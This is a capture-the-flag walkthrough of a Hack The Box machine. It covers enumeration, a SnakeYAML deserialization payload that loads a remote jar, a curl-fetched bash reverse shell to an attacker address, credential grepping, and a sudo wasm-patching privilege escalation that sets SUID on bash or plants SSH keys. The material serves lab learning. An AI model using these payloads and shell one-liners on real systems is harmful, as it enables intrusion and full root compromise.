Machine Info
Machine Info

1. Enumeration:

  • Nmap: To scan for open ports and services running
  • $ nmap -sC -sV -oA 10.10.10.227

We only got two open ports: ssh on (port 22), apache server on (port 8080)

2. Web enumeration:

let’s discover what’s running over there..

and the source code (press ctrl+u)

so we got a Yaml parser and nothing interesting in the source code ..

also try any yaml code u get this page as a response:

About yaml & parser thing:

  • YAML is a human-readable data-serialization language. It is commonly used for configuration files and in applications where data is being stored or transmitted. YAML targets many of the same communications applications as Extensible Markup Language but has a minimal syntax which intentionally differs from SGML.

  • A parser is a component of a compiler or interpreter, which parses the source code of a computer programming language to create some form of internal representation; the parser is a key step in the compiler frontend.

For me i think its functionality is interesting and maybe it has deserialization vulnerability, but let’s keep digging:

  • Dirsearch:
    • to look for hidden directories; found nothing useful..

$ python3 /PATH/dirsearch/dirsearch.py -u http://10.10.10.227:8080/ -w /usr/share/dirb/wordlists/big.txt -e txt,html,php,log,zip,bac,bak,tar

  • lets search for any YAML parser exploits:
    • SnakeYaml library deserilization vulnerability here and here
    • Found this exploit

  • Download and make changes:

add the commands we want to execute:

  • curl ip/rev.sh -o /tmp/rev.sh to get our reverse shell payload file
  • bash /tmp/rev.sh to execute it and give us a shell

Making the reverse shell file as rev.sh:

  • bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'

Time to compile and get the payload:

  • javac AwesomeScriptEngineFactory.java

  • jar -cvf yaml-payload.jar -C src/ .

3. Exploitation:

  • put this payload in the Yaml parser:
  1. !!javax.script.ScriptEngineManager [
  2.   !!java.net.URLClassLoader [[
  3.     !!java.net.URL ["http://10.10.17.34/yaml-payload.jar"]
  4.   ]]
  5. ]

  • open python server in the folder where your (rev.sh and yaml-payload.jar) files are && open your netcat listener first before proceeding:
  1. sudo python3 -m http.server 80
  2. nc -lvnp port

And here we got a connection as “tomcat” after parsing with our payload ..

  • couldn’t read the user’s flag

  • let’s look deeper

    • found these config files

    • let’s search if there are any credentials: cat * | grep pass

Got the admin’s creds: admin:"whythereisalimit"

  • switch to admin and get the flag:

4. Privilege Escalation:

let’s ssh connect for better interactive shell:

  1. $ ssh admin@10.10.10.227
  2. > password: whythereisalimit
  3. $ locate python
  4. $ /usr/bin/python3.8 -c 'import pty; pty.spawn("/bin/sh")'
  • let’s list the permitted commands for current user: sudo -l » worked without password

NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go which means:

admin can run this go script ‘/opt/wasm-functions/index.go’ as root without password needed

  • Time to check what it does:

From the code we find that it opens the main.wasm file (in the same directory) and if the set value is not equals to 1 it doesn’t work but if it’s 1 we can run the deploy.sh script.

$ cat deploy.sh

Tried to cat main.wasm » it’s a binary file

What is wasm? - it’s a binary format for executables used by web pages..

  • So i thought we need to decompile this binary file (main.wasm) and read what’s in there and try to change the value from 0 to 1 so we can run the deploy.sh script which we will edit and put our ssh public key and get permitted by root..

  • let’s look for online decompilers or else for this wasm format:

    • found this one

Transfer the main.wasm to your own machine and upload it to this site:

  1. $ nc -l -p 1234 > main.wasm  on the sender side
  2. $ nc -w 3 10.10.17.34 1234 < main.wasm    on the reciever side
  3. OR 
  4. $ cat file > /dev/tcp/ip/port
  5. $ nc -lvnp port > file

the code after uploading to the site:

the 0 to be changed to 1:

Code after edit:

  1. (module
  2.   (type $t0 (func (result i32)))
  3.   (func $info (export "info") (type $t0) (result i32)
  4.     (i32.const 1))
  5.   (table $T0 1 1 funcref)
  6.   (memory $memory (export "memory") 16)
  7.   (global $g0 (mut i32) (i32.const 1048576))
  8.   (global $__data_end (export "__data_end") i32 (i32.const 1048576))
  9.   (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))

Now download the file as test.wasm:

Final steps:

  • will transfer the test.wasm and name it as main.wasm
  • will make a deploy.sh with our own payload
  • run and getting root .. make these stuff in a writable directory /tmp
  1. > cd /tmp
  2. > echo "chmod +s /bin/bash" > deploy.sh   sets the SUID on /bin/bash
  3. > wget http://10.10.14.5/test.wasm -o main.wasm
  4. > chmod 777 *  to change permissions for all inside dir
  5. > sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
  6. > /bin/bash -p

test.wasm wasn’t renamed as main.wasm

getting root and flag:

Another way:

we also can use our ssh keys

  1. echo 'echo "PUB key" > /root/.ssh/authorized_keys' >> deploy.sh
  2.  > wget http://10.10.14.5/test.wasm -o main.wasm
  3.  > sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

connecting with our private key:

  • ssh -i id_rsa root@10.10.10.227

Done..

Hope you enjoyed the writeup ..

If so kindly give me respect Wh1rlw1nd-HTB.